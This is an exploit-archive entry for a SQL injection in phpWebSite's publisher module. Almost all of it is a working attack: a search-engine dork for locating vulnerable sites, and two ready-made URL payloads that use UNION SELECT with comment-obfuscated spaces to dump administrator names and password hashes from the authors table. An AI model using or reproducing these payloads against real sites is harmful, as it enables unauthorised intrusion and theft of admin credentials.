Topic : | phpWebSite (publisher) SQL Injection Vulnerability
|
ExploitAlert : 3504
Credit : S@BUN
Date : 10.03.2008
Download
Plain text version
 Exploit Code : ###############################################################
#
###########powered by phpWebSite(publisher)
#
###############################################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
####
####MAiL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
##DORK 1 : allinurl: "mod php mod publisher"artid
#
################################################################
EXPLOIT 1 :
mod.php
?mod=publisher&op=viewarticle&cid=73&artid=-1/**/union/**/select/**/0,1,con
cat(name,0x3a,pwd),3,4,concat(aid,0x3a,pwd),6,0x3a,8,9/**/from/**/authors/*
EXPLOIT 2 :
mod.php?mod=publisher&op=viewarticle&cid=S@BUN
&artid=-1/**/union/**/select/**/0,1,2,concat(name,0x3a,pwd),4,concat(name,0
x3a,pwd),6,7,8,9,10/**/from/**/authors/*
################################################################
#---------------------------------------------S@BUN
---------------------------------------------------#
################################################################
#------S@BUN--------------------i AM NOT HACKER----------------S@BUN
-------------#
################################################################
#-S@BUN------------------hackturkiye.hackturkiye@gmail.com-----S@BUN-------
#
################################################################
Feedback :
If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
|